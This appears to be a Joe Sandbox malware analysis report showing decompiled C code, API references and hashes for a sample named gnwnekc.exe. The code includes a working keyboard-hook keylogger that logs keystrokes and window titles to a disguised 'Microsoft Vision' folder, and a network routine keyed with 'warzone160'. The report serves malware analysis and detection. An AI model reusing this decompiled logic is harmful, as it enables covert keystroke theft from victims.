					_t9 = 0x200;
					L4:
					 *0x41738c = _t9;
				}
				 *0x417390 = E0040695A(_t9, 4);
				E00405BB5(0);
				if( *0x417390 != 0) {
					L8:
					_t28 = 0;
					__eflags = 0;
					_t31 = 0x416658;
					do {
						_t1 = _t31 + 0x20; // 0x416678
						E004048D4(__eflags, _t1, 0xfa0, 0);
						_t14 =  *0x417390; // 0x283810
						 *((intOrPtr*)(_t14 + _t28 * 4)) = _t31;
						_t18 =  *((intOrPtr*)( *((intOrPtr*)(0x417158 + (_t28 >> 6) * 4)) + 0x18 + (_t28 & 0x0000003f) * 0x38));
						__eflags = _t18 - 0xffffffff;
						if(_t18 == 0xffffffff) {
							L12:
							 *((intOrPtr*)(_t31 + 0x10)) = 0xfffffffe;
						} else {
							__eflags = _t18 - 0xfffffffe;
							if(_t18 == 0xfffffffe) {
								goto L12;
							} else {
								__eflags = _t18;
								if(_t18 == 0) {
									goto L12;
								}
							}
						}
						_t31 = _t31 + 0x38;
						_t28 = _t28 + 1;
						__eflags = _t31 - 0x416700;
					} while (__eflags != 0);
					__eflags = 0;
					return 0;
				} else {
					 *0x41738c = _t30;
					 *0x417390 = E0040695A(_t30, 4);
					_t21 = E00405BB5(0);
					if( *0x417390 != 0) {
						goto L8;
					} else {
						return _t21 | 0xffffffff;
					}
				}
			}

0x004064e2
0x004064ea
0x004064ed
0x004064f6
0x004064f8
0x004064fa
0x00000000
0x004064fa
0x004064ef
0x004064ef
0x004064fc
0x004064fc
0x004064fc
0x0040650b
0x00406510
0x0040651f
0x0040654c
0x0040654d
0x0040654d
0x0040654f
0x00406554
0x0040655b
0x0040655f
0x00406564
0x0040656e
0x00406580
0x00406584
0x00406587
0x00406592
0x00406592
0x00406589
0x00406589
0x0040658c
0x00000000
0x0040658e
0x0040658e
0x00406590
0x00000000
0x00000000
0x00406590
0x0040658c
0x00406599
0x0040659c
0x0040659d
0x0040659d
0x004065a6
0x004065a9
0x00406521
0x00406524
0x00406531
0x00406536
0x00406545
0x00000000
0x00406547
0x0040654b
0x0040654b
0x00406545

APIs

_free.LIBCMT ref: 00406510
_free.LIBCMT ref: 00406536

Strings

XfA, xrefs: 0040654F

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: _free
String ID: XfA
API String ID: 269201875-2945588029
Opcode ID: eb8d769550fbb01b57c229e5465fd74317bd4cc391576dedc38c1bfc8db653a9
Instruction ID: 79f92c9fcaeeae16a9342114995ab5baeb5ae5518b9c43b6957482a58298109e
Opcode Fuzzy Hash: eb8d769550fbb01b57c229e5465fd74317bd4cc391576dedc38c1bfc8db653a9
Instruction Fuzzy Hash: DD11E671A042116BD7209F29BC01B9637A4A750738F16473BFD26EB6D1E37CE851974C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E0040A4F8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t26;
				signed int _t42;
				void* _t44;

				_push(0xc);
				_push(0x4152d8);
				E00401A10(__ebx, __edi, __esi);
				_t42 = 0;
				 *(_t44 - 0x1c) = 0;
				E0040852F( *((intOrPtr*)( *((intOrPtr*)(_t44 + 8)))));
				 *((intOrPtr*)(_t44 - 4)) = 0;
				if(( *( *((intOrPtr*)(0x417158 + ( *( *( *(_t44 + 0xc))) >> 6) * 4)) + 0x28 + ( *( *( *(_t44 + 0xc))) & 0x0000003f) * 0x38) & 0x00000001) == 0) {
					L3:
					 *((intOrPtr*)(E004065F6(_t49))) = 9;
					_t42 = _t42 | 0xffffffff;
				} else {
					_t26 = FlushFileBuffers(E00408141(_t39));
					_t49 = _t26;
					if(_t26 == 0) {
						_t42 = E00406609(_t49);
						 *_t42 = GetLastError();
						goto L3;
					}
				}
				 *(_t44 - 0x1c) = _t42;
				 *((intOrPtr*)(_t44 - 4)) = 0xfffffffe;
				E0040A58E();
				_t13 = _t44 - 0x10; // 0x406374
				 *[fs:0x0] =  *_t13;
				return _t42;
			}

0x0040a4f8
0x0040a4fa
0x0040a4ff
0x0040a504
0x0040a506
0x0040a50e
0x0040a514
0x0040a537
0x0040a55a
0x0040a55f
0x0040a565
0x0040a539
0x0040a541
0x0040a547
0x0040a549
0x0040a550
0x0040a558
0x00000000
0x0040a558
0x0040a549
0x0040a568
0x0040a56b
0x0040a572
0x0040a579
0x0040a57c
0x0040a588

APIs

Part of subcall function 0040852F: EnterCriticalSection.KERNEL32(00000001,?,0040A5FE,?,004152F8,00000010,004062B5,00000000,00000000,?,?,?,?,0040624C,?,00000000), ref: 0040854A

FlushFileBuffers.KERNEL32 ref: 0040A541
GetLastError.KERNEL32 ref: 0040A552

Strings

tc@, xrefs: 0040A579

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: BuffersCriticalEnterErrorFileFlushLastSection
String ID: tc@
API String ID: 4109680722-2494914666
Opcode ID: 545b111415b0e48b240af109eb91a41c2fb8b2137dabee29e29f717508a4034c
Instruction ID: 6deb588d86354f9cd818fcba4fbcfa1ada93347c37fdcc8e48197b277fa95a5b
Opcode Fuzzy Hash: 545b111415b0e48b240af109eb91a41c2fb8b2137dabee29e29f717508a4034c
Instruction Fuzzy Hash: 08018072A002049FC714AFA9E90569E77B0EB89724B14426FF811AB3E1DB78D8418B49

Uniqueness

Uniqueness Score: -1.00%

Function 00404742 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404742(char _a4) {
				struct HINSTANCE__** _t5;

				if(_a4 == 0) {
					_t5 = 0x416f28;
					do {
						if( *_t5 != 0) {
							if( *_t5 != 0xffffffff) {
								FreeLibrary( *_t5);
							}
							 *_t5 =  *_t5 & 0x00000000;
						}
						_t5 =  &(_t5[1]);
					} while (_t5 != 0x416f78);
				}
				return 1;
			}

0x0040474b
0x0040474e
0x00404753
0x00404756
0x0040475b
0x0040475f
0x0040475f
0x00404765
0x00404765
0x00404768
0x0040476b
0x00404773
0x00404777

APIs

FreeLibrary.KERNEL32(00416F28), ref: 0040475F

Strings

xoA, xrefs: 0040476B
(oA, xrefs: 0040474E

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: FreeLibrary
String ID: (oA$xoA
API String ID: 3664257935-1795384092
Opcode ID: fbeb7b17edff8592abb929a8f4559d9e84d25e3b0c4976b624a5bfd4eb64fc0f
Instruction ID: dc7bf664ccc718e12e6d4739878c8231e49a9d63bcb202f44ca2c1518a9f5354
Opcode Fuzzy Hash: fbeb7b17edff8592abb929a8f4559d9e84d25e3b0c4976b624a5bfd4eb64fc0f
Instruction Fuzzy Hash: 8EE04F7280021596DB302A18E44479177E45791336F16423BD9BC262E093794CD2C689

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: gnwnekc.exePID: 2052, Parent PID: 508COMMON

Execution Graph

Execution Coverage:	14.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	48

Executed Functions

Function 004074D5 Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 286
keyboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004074D5(signed int __ecx, int __edx, long _a4) {
				signed int _v8;
				int _v12;
				short _v24;
				short _v56;
				void* _t21;
				short _t24;
				short _t27;
				void* _t36;
				int _t46;
				signed int _t48;
				WCHAR* _t49;
				WCHAR* _t50;
				long _t57;
				void* _t58;
				short _t59;
				short _t60;
				short _t62;
				short _t63;
				short _t64;
				short _t66;
				short _t67;
				short _t69;
				short _t70;
				short _t71;
				short _t73;
				short _t75;
				short _t77;
				short _t78;
				short _t79;
				signed int _t81;

				_t55 = __edx;
				_t48 = __ecx;
				_t46 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t57 = _a4;
				_t21 = __edx - 0x100;
				if(_t21 == 0 || _t21 == 4) {
					_t58 =  *_t57;
					if(_t58 < 0x27) {
						__eflags = _t58 - 0x40;
						if(_t58 <= 0x40) {
							L21:
							__eflags = _t58 - 0x66;
							if(__eflags > 0) {
								__eflags = _t58 - 0xbc;
								if(__eflags > 0) {
									__eflags = _t58 - 0xdb;
									if(__eflags > 0) {
										_t59 = _t58 - 0xdc;
										__eflags = _t59;
										if(_t59 == 0) {
											_t24 = GetAsyncKeyState(0x10);
											_t49 = "|";
											__eflags = _t24;
											if(__eflags == 0) {
												_t49 = "\\"; // executed
											}
											L99:
											E00407966(_t49, _t55, _t90); // executed
											goto L100;
										}
										_t60 = _t59 - 1;
										__eflags = _t60;
										if(_t60 == 0) {
											_t27 = GetAsyncKeyState(0x10);
											_t50 = "}";
											_t55 = "]";
											L76:
											__eflags = _t27;
											_t49 =  ==  ? _t55 : _t50;
											goto L99;
										}
										__eflags = _t60 - 1;
										if(__eflags == 0) {
											_t27 = GetAsyncKeyState(0x10);
											_t50 = "\"";
											_t55 = "\'";
											goto L76;
										}
										L94:
										GetKeyNameTextW((( *(_t57 + 8) << 8) +  *((intOrPtr*)(_t57 + 4)) << 0x10) + 1,  &_v56, 0xf);
										_t49 =  &_v56;
										goto L99;
									}
									if(__eflags == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "{";
										_t55 = "[";
										goto L76;
									}
									_t62 = _t58 - 0xbd;
									__eflags = _t62;
									if(_t62 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "_";
										_t55 = "-";
										goto L76;
									}
									_t63 = _t62 - 1;
									__eflags = _t63;
									if(_t63 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = ">";
										_t55 = ".";
										goto L76;
									}
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "?";
										_t55 = "/";
										goto L76;
									}
									__eflags = _t64 - 1;
									if(__eflags != 0) {
										goto L94;
									}
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "~";
									_t55 = "`";
									goto L76;
								}
								if(__eflags == 0) {
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "<";
									_t55 = ",";
									goto L76;
								}
								__eflags = _t58 - 0xa3;
								if(_t58 > 0xa3) {
									__eflags = _t58 - 0xa5;
									if(__eflags <= 0) {
										L78:
										_t49 = L"[ALT]";
										goto L99;
									}
									__eflags = _t58 - 0xba;
									if(_t58 == 0xba) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = ":";
										_t55 = ";";
										goto L76;
									}
									__eflags = _t58 - 0xbb;
									if(__eflags != 0) {
										goto L94;
									}
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "+";
									_t55 = "=";
									goto L76;
								}
								__eflags = _t58 - 0xa2;
								if(__eflags >= 0) {
									L71:
									_t49 = L"[CTRL]";
									goto L99;
								}
								__eflags = _t58 - 0x67;
								if(__eflags == 0) {
									_t49 = "7";
									goto L99;
								}
								__eflags = _t58 - 0x68;
								if(__eflags == 0) {
									_t49 = "8";
									goto L99;
								}
								__eflags = _t58 - 0x69;
								if(__eflags == 0) {
									_t49 = "9";
									goto L99;
								}
								__eflags = _t58 - 0xa0 - 1;
								if(__eflags > 0) {
									goto L94;
								}
								goto L100;
							}
							if(__eflags == 0) {
								_t49 = "6";
								goto L99;
							}
							__eflags = _t58 - 0x20;
							if(__eflags > 0) {
								__eflags = _t58 - 0x62;
								if(__eflags > 0) {
									_t66 = _t58 - 0x63;
									__eflags = _t66;
									if(__eflags == 0) {
										_t49 = "3";
										goto L99;
									}
									_t67 = _t66 - 1;
									__eflags = _t67;
									if(__eflags == 0) {
										_t49 = "4";
										goto L99;
									}
									__eflags = _t67 - 1;
									if(__eflags != 0) {
										goto L94;
									}
									_t49 = "5";
									goto L99;
								}
								if(__eflags == 0) {
									_t49 = "2";
									goto L99;
								}
								_t69 = _t58 - 0x2d;
								__eflags = _t69;
								if(__eflags == 0) {
									_t49 = L"[INSERT]";
									goto L99;
								}
								_t70 = _t69 - 1;
								__eflags = _t70;
								if(__eflags == 0) {
									_t49 = L"[DEL]";
									goto L99;
								}
								_t71 = _t70 - 0x32;
								__eflags = _t71;
								if(__eflags == 0) {
									_t49 = "0";
									goto L99;
								}
								__eflags = _t71 - 1;
								if(__eflags != 0) {
									goto L94;
								}
								_t49 = "1";
								goto L99;
							}
							if(__eflags == 0) {
								_t49 = " ";
								goto L99;
							}
							__eflags = _t58 - 0x11;
							if(__eflags > 0) {
								_t73 = _t58 - 0x12;
								__eflags = _t73;
								if(__eflags == 0) {
									goto L78;
								}
								_t75 = _t73;
								__eflags = _t75;
								if(__eflags == 0) {
									_t49 = L"[CAPS]";
									goto L99;
								}
								__eflags = _t75 - 7;
								if(__eflags != 0) {
									goto L94;
								}
								_t49 = L"[ESC]";
								goto L99;
							}
							if(__eflags == 0) {
								goto L71;
							}
							_t77 = _t58 - 8;
							__eflags = _t77;
							if(__eflags == 0) {
								_t49 = L"[BKSP]";
								goto L99;
							}
							_t78 = _t77 - 1;
							__eflags = _t78;
							if(__eflags == 0) {
								_t49 = L"[TAB]";
								goto L99;
							}
							_t79 = _t78 - 4;
							__eflags = _t79;
							if(__eflags == 0) {
								_t49 = L"[ENTER]\r\n";
								goto L99;
							}
							__eflags = _t79 - 3;
							if(__eflags == 0) {
								goto L100;
							}
							goto L94;
						}
						L19:
						__eflags = _t58 - 0x5b;
						if(_t58 >= 0x5b) {
							goto L21;
						}
						_t36 = E0040795B();
						__eflags = GetAsyncKeyState(0x10);
						__eflags = E00407949(_t48 & 0xffffff00 | GetAsyncKeyState(0x10) != 0x00000000, _t36);
						_t53 =  !=  ? _t58 : _t58 + 0x20;
						wsprintfW( &_v24, L"%c",  !=  ? _t58 : _t58 + 0x20);
						E00407966( &_v24, _t36, __eflags); // executed
						_t46 = _v8;
						goto L100;
					}
					if(_t58 > 0x40) {
						goto L19;
					}
					if(GetAsyncKeyState(0x10) == 0) {
						wsprintfW( &_v24, L"%c", _t58);
						_t49 =  &_v24;
						goto L99;
					}
					_t81 = _t58 + 0xffffffd0;
					_t90 = _t81 - 9;
					if(_t81 > 9) {
						goto L100;
					}
					switch( *((intOrPtr*)(_t81 * 4 +  &M00407921))) {
						case 0:
							_t49 = ")";
							goto L99;
						case 1:
							__ecx = "!";
							goto L99;
						case 2:
							__ecx = "@";
							goto L99;
						case 3:
							__ecx = "#";
							goto L99;
						case 4:
							__ecx = "$";
							goto L99;
						case 5:
							__ecx = "%";
							goto L99;
						case 6:
							__ecx = "^";
							goto L99;
						case 7:
							__ecx = "&";
							goto L99;
						case 8:
							__ecx = "*";
							goto L99;
						case 9:
							__ecx = "(";
							goto L99;
					}
				} else {
					L100:
					return CallNextHookEx(0, _t46, _v12, _t57);
				}
			}

0x004074d5
0x004074d5
0x004074de
0x004074e1
0x004074e4
0x004074e8
0x004074eb
0x004074f0
0x004074fb
0x00407500
0x004075ae
0x004075b1
0x004075ff
0x004075ff
0x00407602
0x00407722
0x00407724
0x004077fb
0x004077fd
0x00407890
0x00407890
0x00407896
0x004078f1
0x004078f7
0x004078fc
0x004078ff
0x00407901
0x00407901
0x00407906
0x00407906
0x00000000
0x00407906
0x00407898
0x00407898
0x0040789b
0x004078da
0x004078e0
0x004078e5
0x004077b9
0x004077b9
0x004077bc
0x00000000
0x004077bc
0x0040789d
0x004078a0
0x004078c3
0x004078c9
0x004078ce
0x00000000
0x004078ce
0x004078a2
0x004078b6
0x004078bc
0x00000000
0x004078bc
0x00407803
0x0040787b
0x00407881
0x00407886
0x00000000
0x00407886
0x00407805
0x00407805
0x0040780b
0x00407864
0x0040786a
0x0040786f
0x00000000
0x0040786f
0x0040780d
0x0040780d
0x00407810
0x0040784d
0x00407853
0x00407858
0x00000000
0x00407858
0x00407812
0x00407812
0x00407815
0x00407836
0x0040783c
0x00407841
0x00000000
0x00407841
0x00407817
0x0040781a
0x00000000
0x00000000
0x00407822
0x00407828
0x0040782d
0x00000000
0x0040782d
0x0040772a
0x004077e4
0x004077ea
0x004077ef
0x00000000
0x004077ef
0x00407730
0x00407736
0x0040778b
0x00407791
0x004077d8
0x004077d8
0x00000000
0x004077d8
0x00407793
0x00407799
0x004077c6
0x004077cc
0x004077d1
0x00000000
0x004077d1
0x0040779b
0x004077a1
0x00000000
0x00000000
0x004077a9
0x004077af
0x004077b4
0x00000000
0x004077b4
0x00407738
0x0040773e
0x00407781
0x00407781
0x00000000
0x00407781
0x00407740
0x00407743
0x00407777
0x00000000
0x00407777
0x00407745
0x00407748
0x0040776d
0x00000000
0x0040776d
0x0040774a
0x0040774d
0x00407763
0x00000000
0x00407763
0x00407755
0x00407758
0x00000000
0x00000000
0x00000000
0x0040775e
0x00407608
0x00407713
0x00000000
0x00407713
0x0040760e
0x00407611
0x00407691
0x00407694
0x004076e2
0x004076e2
0x004076e5
0x00407709
0x00000000
0x00407709
0x004076e7
0x004076e7
0x004076ea
0x004076ff
0x00000000
0x004076ff
0x004076ec
0x004076ef
0x00000000
0x00000000
0x004076f5
0x00000000
0x004076f5
0x00407696
0x004076d8
0x00000000
0x004076d8
0x00407698
0x00407698
0x0040769b
0x004076ce
0x00000000
0x004076ce
0x0040769d
0x0040769d
0x004076a0
0x004076c4
0x00000000
0x004076c4
0x004076a2
0x004076a2
0x004076a5
0x004076ba
0x00000000
0x004076ba
0x004076a7
0x004076aa
0x00000000
0x00000000
0x004076b0
0x00000000
0x004076b0
0x00407613
0x00407687
0x00000000
0x00407687
0x00407615
0x00407618
0x0040765b
0x0040765b
0x0040765e
0x00000000
0x00000000
0x00407665
0x00407665
0x00407668
0x0040767d
0x00000000
0x0040767d
0x0040766a
0x0040766d
0x00000000
0x00000000
0x00407673
0x00000000
0x00407673
0x0040761a
0x00000000
0x00000000
0x00407620
0x00407620
0x00407623
0x00407651
0x00000000
0x00407651
0x00407625
0x00407625
0x00407628
0x00407647
0x00000000
0x00407647
0x0040762a
0x0040762a
0x0040762d
0x0040763d
0x00000000
0x0040763d
0x0040762f
0x00407632
0x00000000
0x00000000
0x00000000
0x00407638
0x004075b3
0x004075b3
0x004075b6
0x00000000
0x00000000
0x004075b8
0x004075c7
0x004075d4
0x004075dc
0x004075e6
0x004075f2
0x004075f7
0x00000000
0x004075f7
0x00407509
0x00000000
0x00000000
0x0040751a
0x0040759d
0x004075a6
0x00000000
0x004075a6
0x0040751c
0x0040751f
0x00407522
0x00000000
0x00000000
0x00407528
0x00000000
0x0040752f
0x00000000
0x00000000
0x00407539
0x00000000
0x00000000
0x00407543
0x00000000
0x00000000
0x0040754d
0x00000000
0x00000000
0x00407557
0x00000000
0x00000000
0x00407561
0x00000000
0x00000000
0x0040756b
0x00000000
0x00000000
0x00407575
0x00000000
0x00000000
0x0040757f
0x00000000
0x00000000
0x00407589
0x00000000
0x00000000
0x0040790b
0x0040790b
0x0040791c
0x0040791c

APIs

GetAsyncKeyState.USER32 ref: 00407511
CallNextHookEx.USER32 ref: 00407912

Part of subcall function 00407966: GetForegroundWindow.USER32 ref: 0040798F
Part of subcall function 00407966: GetWindowTextW.USER32 ref: 004079A2
Part of subcall function 00407966: lstrlenW.KERNEL32(00416B88,{Unknown},?,?), ref: 00407A0B
Part of subcall function 00407966: CreateFileW.KERNEL32(01F70000,00000004,00000001,00000000,00000004,00000080,00000000), ref: 00407A79
Part of subcall function 00407966: lstrlenW.KERNEL32(004127C0,00416DA0,00000000,?,?), ref: 00407AA2
Part of subcall function 00407966: WriteFile.KERNEL32(00000268,004127C0,00000000,?,?), ref: 00407AAE

Strings

[CTRL], xrefs: 00407781
[BKSP], xrefs: 00407651
[TAB], xrefs: 00407647
[ALT], xrefs: 004077D8
[ESC], xrefs: 00407673
[INSERT], xrefs: 004076CE
[CAPS], xrefs: 0040767D
[DEL], xrefs: 004076C4
[ENTER], xrefs: 0040763D

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: FileWindowlstrlen$AsyncCallCreateForegroundHookNextStateTextWrite
String ID: [ALT]$[BKSP]$[CAPS]$[CTRL]$[DEL]$[ENTER]$[ESC]$[INSERT]$[TAB]
API String ID: 2452648998-4143582258
Opcode ID: d760053ecd7699525f4077e00d1313e0c3007c17875c722993cebe34cb5ab308
Instruction ID: 1e4e6ff72afcba4c5a3719967ee51c51754838019681a6ccc922eb8e763abede
Opcode Fuzzy Hash: d760053ecd7699525f4077e00d1313e0c3007c17875c722993cebe34cb5ab308
Instruction Fuzzy Hash: 4891B072E1C0099BEB2921284758AFA6511E741340F10C237DAA7B77D4D7BC7DA2A39F

Uniqueness

Uniqueness Score: -1.00%

Function 00407376 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 114
stringwindowfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00407376(void* __eflags) {
				struct _SYSTEMTIME _v24;
				struct tagMSG _v52;
				short _v216;
				struct HINSTANCE__* _t17;
				intOrPtr _t20;
				intOrPtr _t23;
				intOrPtr _t25;
				intOrPtr _t38;
				intOrPtr _t43;
				void* _t44;
				void* _t48;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t59;
				void* _t60;
				intOrPtr* _t64;

				_t17 = GetModuleHandleA(0);
				_t55 =  *0x4166ac; // 0x416d98
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				E00401052(_t55 + 0x210, 0, 0x800);
				_t20 =  *0x4166ac; // 0x416d98
				E00401052(_t20 + 0x10, 0, 0x208);
				_t23 =  *0x4166ac; // 0x416d98
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t23 + 0x10);
				_t25 =  *0x4166ac; // 0x416d98
				lstrcatW(_t25 + 0x10, L"\\Microsoft Vision\\");
				GetLocalTime( &_v24);
				wsprintfW( &_v216, L"%02d-%02d-%02d_%02d.%02d.%02d", _v24.wDay & 0x0000ffff, _v24.wMonth & 0x0000ffff, _v24.wYear & 0x0000ffff, _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff);
				_t38 =  *0x4166ac; // 0x416d98
				lstrcatW(_t38 + 0x10,  &_v216);
				_t57 =  *0x4166ac; // 0x416d98
				_t11 = _t57 + 0x10; // 0x416da8
				E004030C5(_t57 + 0xc, _t60, _t11);
				_t43 =  *0x4166ac; // 0x416d98
				_t12 = _t43 + 0xc; // 0x1f70000, executed
				_t44 = CreateFileW( *_t12, 0x10000000, 1, 0, 2, 0x80, 0);
				_t59 =  *0x4166ac; // 0x416d98
				 *(_t59 + 4) = _t44;
				CloseHandle(_t44); // executed
				SetWindowsHookExA(0xd, E004074C0, _t17, 0); // executed
				_t64 = GetMessageA;
				while(1) {
					_t48 =  *_t64( &_v52, 0, 0, 0); // executed
					if(_t48 <= 0) {
						break;
					}
					TranslateMessage( &_v52);
					DispatchMessageA( &_v52);
				}
				return 0;
			}

0x00407384
0x0040738a
0x0040739d
0x004073a3
0x004073a4
0x004073a5
0x004073aa
0x004073af
0x004073be
0x004073c3
0x004073d4
0x004073da
0x004073ee
0x004073f4
0x00407424
0x00407434
0x0040743d
0x0040743f
0x00407445
0x0040744c
0x00407451
0x00407466
0x00407469
0x0040746f
0x00407476
0x00407479
0x00407488
0x0040748e
0x004074aa
0x004074b1
0x004074b5
0x00000000
0x00000000
0x0040749a
0x004074a4
0x004074a4
0x004074bd

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00407384
SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,00416D88), ref: 004073D4
lstrcatW.KERNEL32 ref: 004073EE
GetLocalTime.KERNEL32(?), ref: 004073F4
wsprintfW.USER32 ref: 00407424
lstrcatW.KERNEL32 ref: 0040743D
CreateFileW.KERNEL32(01F70000,10000000,00000001,00000000,00000002,00000080,00000000), ref: 00407469
CloseHandle.KERNEL32(00000000), ref: 00407479
SetWindowsHookExA.USER32(0000000D,004074C0,00000000,00000000), ref: 00407488
TranslateMessage.USER32(?), ref: 0040749A
DispatchMessageA.USER32 ref: 004074A4
KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 004074B1

Strings

\Microsoft Vision\, xrefs: 004073E8
%02d-%02d-%02d_%02d.%02d.%02d, xrefs: 0040741E
C:\Users\user\AppData\Local\Microsoft Vision\05-01-2023_12.32.23, xrefs: 0040744B

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: HandleMessagelstrcat$CallbackCloseCreateDispatchDispatcherFileFolderHookLocalModulePathTimeTranslateUserWindowswsprintf
String ID: %02d-%02d-%02d_%02d.%02d.%02d$C:\Users\user\AppData\Local\Microsoft Vision\05-01-2023_12.32.23$\Microsoft Vision\
API String ID: 4117748762-1736269360
Opcode ID: 28b51c0486f4d8aca80219bee5fcc481cf51a473dbc5be7bfd11f24c0730f01a
Instruction ID: cde6b568e0b10344db86afc49b6864f67914606850f5310ef25aa5f0acf6a477
Opcode Fuzzy Hash: 28b51c0486f4d8aca80219bee5fcc481cf51a473dbc5be7bfd11f24c0730f01a
Instruction Fuzzy Hash: 4F3150B2900104BBDB509BA5DD49FEB7BBCEB48705F008426F605E2191D6B9D920CB39

Uniqueness

Uniqueness Score: -1.00%

Function 004050CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 149
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E004050CC(intOrPtr __ecx, void* __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				char _v4160;
				intOrPtr _t50;
				void* _t53;
				intOrPtr _t57;
				void* _t89;
				intOrPtr _t91;
				void* _t117;
				void* _t118;
				signed int _t119;
				signed int _t120;
				void* _t122;
				void* _t123;

				_t117 = __edx;
				_t91 = __ecx;
				E00401130(0x1040, __ecx);
				_t50 = _t91;
				_v12 = _t50;
				if( *((intOrPtr*)(_t50 + 0xc)) != 0xffffffff) {
					_v36 = 0xea60;
					__imp__#21( *((intOrPtr*)(_t50 + 0xc)), 0xffff, 0x1006,  &_v36, 4); // executed
					E00401052( &_v4160, 0, 0x1000);
					_t123 = _t122 + 0xc;
					_t53 = E00403185( &_v16, "warzone160"); // executed
					E00402DCC( &_v52, _t117, _t53);
					E004058FB(_v16);
					_v24 = 0;
					_v20 = 0;
					while(1) {
						_t120 = _t119 | 0xffffffff;
						_t89 = 0x1000;
						_t118 = 0xfffffffe;
						L3:
						L3:
						if(_t120 != 0xffffffff) {
							_t89 =  <  ? _t120 - _t118 : _t89;
						}
						_t57 = _v12;
						__imp__#16( *((intOrPtr*)(_t57 + 0xc)),  &_v4160, _t89, 0); // executed
						_v16 = _t57;
						if(_t57 <= 0) {
							goto L11;
						}
						if(_t120 == 0xffffffff && _t57 >= 0xc) {
							_v32 = _v32 & 0x00000000;
							_v28 = _v28 & 0x00000000;
							E00402D5A( &_v32,  &_v4160, 0xc);
							E00402E12(_t123,  &_v32);
							E00402E12(_t123,  &_v52);
							E00405B00( &_v60, _t117, _t123, _t123,  &_v32,  &_v32);
							_t123 = _t123 + 0x10;
							_t118 = 0;
							_t120 =  *((intOrPtr*)(_v60 + 4)) + 0xc;
							E00402DFF( &_v60);
							E00402DFF( &_v32);
							_t57 = _v16;
						}
						_t118 = _t118 + _t57;
						E00402D5A(_v12 + 0x10,  &_v4160, _t57);
						if(_t118 < _t120) {
							goto L3;
						} else {
							_t119 = _v12 + 0x10;
							E00402D5A( &_v24,  *_t119, _t118);
							E00402E12(_t123,  &_v24);
							E00402E12(_t123,  &_v52);
							E00405B00( &_v44, _t117, _t123, _t123,  &_v24,  &_v24);
							_t123 = _t123 + 0x10;
							E00402D8C(_t119);
							E00402D5A(_t119, _v44, _t118);
							E00402D8C( &_v24);
							E00402D8C( &_v44);
